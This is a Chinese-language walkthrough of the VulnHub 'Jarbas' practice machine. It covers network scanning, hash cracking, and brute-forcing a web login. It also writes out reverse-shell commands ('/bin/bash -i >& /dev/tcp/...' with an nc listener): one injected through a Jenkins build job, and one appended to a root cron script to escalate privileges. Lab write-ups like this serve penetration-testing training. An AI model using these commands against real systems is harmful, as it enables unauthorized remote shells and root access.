vulnhub-jarbas靶机
打靶训练第三台
下载地址 https://download.vulnhub.com/jarbas/Jarbas.zip
环境配置
下载好靶机 打开ovf文件即可
信息探测
arp-scan -l
确定靶机IP地址
确定靶机IP地址为 192.168.56.161
nmap -sS -p 1-65535 -v 192.168.56.161
nmap扫描得到开放端口 和对应的服务
得到开放端口为
22 80 3306 8080
web渗透
首先我们访问IP
上面提示了jaebas 我以为这是建站CMS之类的。放到kali里面搜索 没有搜索出来。
尝试了下目录暴破
访问其中的access得到上面的内容。肉眼感觉是md5加密 放到网站解密出来类似于密码
| 用户名 | 密码 | 是否登录成功 |
|---|---|---|
| tiago | italia99 | 否 |
| trindade | vipsu | 否 |
| eder | Marianna | 否 |
直接用账号密码登录,但是他那个不是对应的。通过burp的那个暴破,成功得到账号密码进去。
账号密码分别为 eder vipsu
生成一个任务 选择第一个
来到这个地方 尝试写入反弹shell
/bin/bash -i >& /dev/tcp/192.168.56.132/1234 0>&1
点击保存
然后到kali端监听对应的端口。
nc -lvnp 1234
然后点击立即构建。
成功反弹到shell
计划任务提权
查看权限
whoami
sudo -l
显示没有任何权限
查看计划任务 发现有一个root用户执行的脚本
cat /etc/crontab
查看脚本
cat /etc/script/CleaningScript.sh
![image-20230914183719792](https://raw.githubusercontent.com/wghahaha/img/main/img/image-20230914183719792.p
将反弹shell的代码写入脚本文件中 那么我们就可以得到一个root权限反弹过来的shell
echo "/bin/bash -i >& /dev/tcp/192.168.56.132/6666 0>&1" >> /etc/script/CleaningScript.sh
同时我们需要另外起一个窗口进行监听
nc -lvnp 6666
最多等5分钟就可以反弹过来了。
反弹成功 且是root权限。
得到flag
总结
这个靶机的难度总体比较简单。可能比较坑的地方就是那个账号密码不是对应的。很多师傅尝试了对应的密码 就完了。没有想去暴破。实战中这种情况感觉确实不太多。还有就是提权用的是计划任务提权,也是一种常见的提权方式。通过存在以root权限运行的脚本文件,然后将反弹shell的命令写入脚本文件中 到了时间 脚本文件就会自己执行。